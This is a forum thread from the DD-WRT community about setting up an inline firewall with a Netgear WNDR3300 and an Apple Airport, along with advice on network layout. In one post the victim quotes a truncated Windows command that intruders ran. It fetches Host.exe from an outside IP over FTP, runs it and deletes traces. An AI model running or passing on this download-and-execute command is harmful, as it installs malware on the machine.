Constructing an inline firewall

Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware
Author Message
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 2:54    Post subject: Constructing an inline firewall Reply with quote
I'm trying to build an inline (IE: between DEMARC & Router) firewall to protect my network.

The network hardware being used is:
"Firewall": Netgear RangeMax Duo, Wireless-N Router WNDR3300. Running Firmware: DD-WRT v24-sp2 (07/22/09) mini

Router: Apple Airport Extreme (802.11n) Generation 1, Model A1143

DEMARC: A coaxial cable modem from Comcast, running on dynamic IP.

So far I haven't had any luck getting the Firewall to work at all. I uploaded the rules with fwbuilder and now the thing appears partially bricked. No ping response and no access to SSH or webconfig. If I connect to it via it's wifi (came back on after reset), though, I can access the internet. I tried the 30/30/30 reset but it seems that did not remove the bad firewall rules or something.

I followed this http://blogs.walkerart.org/newmedia/2009/06/22/build-a-bridging-firewall-cheap/

And this http://www.dd-wrt.com/wiki/index.php/Firewall_Builder

Pretty pissed the thing is bricked, but I'm still hopeful for a solution.

My infrastructure looks like this:
Sponsor
_Robb_
DD-WRT User


Joined: 14 Jan 2012
Posts: 233
Location: Wr PL

PostPosted: Mon Sep 01, 2014 5:48    Post subject: Reply with quote
To me it looks like the firewall rules.
_________________
http://speedtest.net/result/3185937120.png

DO NOT 30-30-30 or erase nvram newer routers! It can brick them.

EA6700: Build r25143 (nvram below 32K, ipv6 - HE 6in4)
E4200: Build 22000++M
WRT54GL: Retired - waiting in the closet for an emergency.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 10:46    Post subject: Reply with quote
Hmm, yeah. I just don't know why they aren't being reset...

I really need this online as I've been getting people hacking my VNC/SMB and DNS attacks. I have another router I could use, but dang.
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 217
Location: Michigan

PostPosted: Mon Sep 01, 2014 11:40    Post subject: Reply with quote
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 12:17    Post subject: Reply with quote
notorious.dds wrote:
Are you just trying to put another barrier between your modem and the Airport, or are you trying to separate things within your own network? If it's the former, I'm curious why the firewall on the airport is not adequate.


I really just need something with flexibility and easily configurable parameters. As far as I know Airport doesn't let you touch the firewall (at least, not easily on a PC), and it actually let some guy get into my VNC (no forwarded ports, he tunneled into my gateway server and compromised it from there). It also doesn't block spoofed DNS attacks, which I get about 20 times a day.

The code they try to run when they break into the VNC usually looks like this:
Code:
cmd.exe /c "echo on&@echo open 208.109.108.16>script.txt&echo um>>script.txt&echo um>>script.txt&@echo binary>>script.txt&@echo get /Host.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v &@start Host.exe &@del script.txt&@reg delete HKEY_CURRENT_U ~~

It's broken because the text field cut it off, luckily...

Anyways, some cheeky guy keeps calling me telling me to type in shit into the run prompt (the usual "your computer is dun broke!" scam). He has my address, name, and phone number, and the last time he called he threatened to kill me/my family/hack me. Pretty much yelling into the phone. So yeah, super fun.

The attack comes in on port 53 (the DNS port) but it isn't a real DNS response, and isn't in response to a DNS request. The packet that's sent to me is malformed, and is actually a check-in message to a trojan virus that was reported to be injected earlier on. The trojan virus checked into their sever after being installed (via a javascript exploit, yay), so their server checks back to activate it and send remote commands.

The amount of attacks I've received are immense, and aren't showing any signs of stopping. I need to buy a REAL firewall and possibly set up a Virtual Private Network to funnel my internet traffic through. They're targeting me based on information that does not correlate with my public IP address, because it's dynamic and they'd be looking at a few people per month on one address. Considering the fact that some guy knows my name, address, and phone number, I don't doubt they could easily track every single activity that isn't encrypted or funneled through a VPN. What might be useful to me is a VPN Firewall/Router combo.

The packets are sent using connectionless UDP usually. UDP doesn't require an established connection, so they can just send packets to whoever they want without permission, as opposed to a TCP connection. Another reason they use UDP is that they can forge their IP address, much like forging a drivers license. You can't trace that kind of IP address back to them because it's fake, and always actually belongs to someone else who didn't do anything wrong.

Even a passworded server, secure computer, and an encrypted/passworded VNC server (apparently!) aren't safe against this. The trojan virus is able to inject itself through even open web pages, requiring you only to open the page just once.
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 217
Location: Michigan

PostPosted: Mon Sep 01, 2014 12:33    Post subject: Reply with quote
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.

Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 12:41    Post subject: Reply with quote
notorious.dds wrote:
Geez, that's pretty terrible. Given your story, I'm not sure what level of security is needed in your case. At any rate, I can get you where you want to go with your current setup.

Another question I have is regarding the continued use of the Airport. Can I assume you want to keep this in use mainly due to the 802.11AC, or is there some other reason?


Yeah, the Airport is my most capable WLAN router at the moment.

I'm definitely going to invest ($$$) in more security and hardware later, but for now this is a good temporary ass-covering solution for little cost. I have plans to set up some NID/AV servers using the Raspberry Pi as a network device as well (I've heard it's amazing as network hardware).

If I can't fix this Netgear, I have a good ol' Linksys WRT54G v5 I can use. Well, not quite "good" as the v5 sucks butts, but still better than a brick. Unless, of course, I can beat my attackers to death with it...
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 217
Location: Michigan

PostPosted: Mon Sep 01, 2014 13:31    Post subject: Reply with quote
Okay, so the easiest solution I can offer is to use the netgear is it's default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)

Another option would be to set up a subnet with the airport. However, this would isolate anything connected to airport from anything connected to the netgear, and it would add anthother routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.
Floofies
DD-WRT Novice


Joined: 01 Sep 2014
Posts: 5
Location: United States

PostPosted: Mon Sep 01, 2014 14:24    Post subject: Reply with quote
notorious.dds wrote:
Okay, so the easiest solution I can offer is to use the netgear is it's default setup (i.e. router/gateway) and to configure your airport as a wireless access point. You'll have wireless and use of the LAN ports this way, but no routing or firewall through the airport. This should be doable even with stock firmware. (Although, I've found it's not hard to overestimate the configurability of Apple products.)


Ooh, that sounds like it would make everything a lot easier. So instead of funneling the WAN though the Firewall to the WLAN Router, instead just make the Firewall the router and make the WLAN Router just an AP?

I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NIC's.


notorious.dds wrote:

Another option would be to set up a subnet with the airport. However, this would isolate anything connected to airport from anything connected to the netgear, and it would add anthother routing sequence for all data in and out. Unless it turns out that the first method is not possible with the airport, I don't currently see any advantages to your setup using the second method.


That's also a great option, and is what I was trying to do initially.
notorious.dds
DD-WRT User


Joined: 24 May 2012
Posts: 217
Location: Michigan

PostPosted: Mon Sep 01, 2014 15:00    Post subject: Reply with quote
Floofies wrote:
I think there might be a slight speed decrease associated with that, though. The data interchange between the two devices would theoretically be a lot higher than if the WLAN Router handled the routing and DHCP. I'm mostly worried about the capacity of the NIC's.

The speed loss in inevitable so long as you're using firewall on the netgear. It will be your bottleneck. You can turn off DHCP on the netgear and turn it on at the Airport running as an AP, but I don't thing it'll help you much.

Option 2 will allow you to avoid the bottleneck for intranet traffic, but you'll hit it with anything going outside.

My recommendation: Use the first option, but find a router that has a gigabit switch instead of the 10/100 which is on that WNDR3300. I've seen them on Ebay for under $40.

I guess it may be possible to insert the netgear's firewall capabilities between the WAN and LAN of the airport, but that's beyond my understanding... and I still don't see how you would avoid it's hardware limitations...
Wolf_666
DD-WRT Novice


Joined: 02 Jul 2014
Posts: 18
Location: Italy

PostPosted: Mon Sep 01, 2014 19:21    Post subject: Reply with quote
I suggest to look to more powerful i386 appliance running a dedicated OS and Firewall. You should have benefits also for VPN.
Display posts from previous:    Page 1 of 1
Post new topic   Reply to topic    DD-WRT Forum Forum Index -> Broadcom SoC based Hardware All times are GMT

Navigation

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum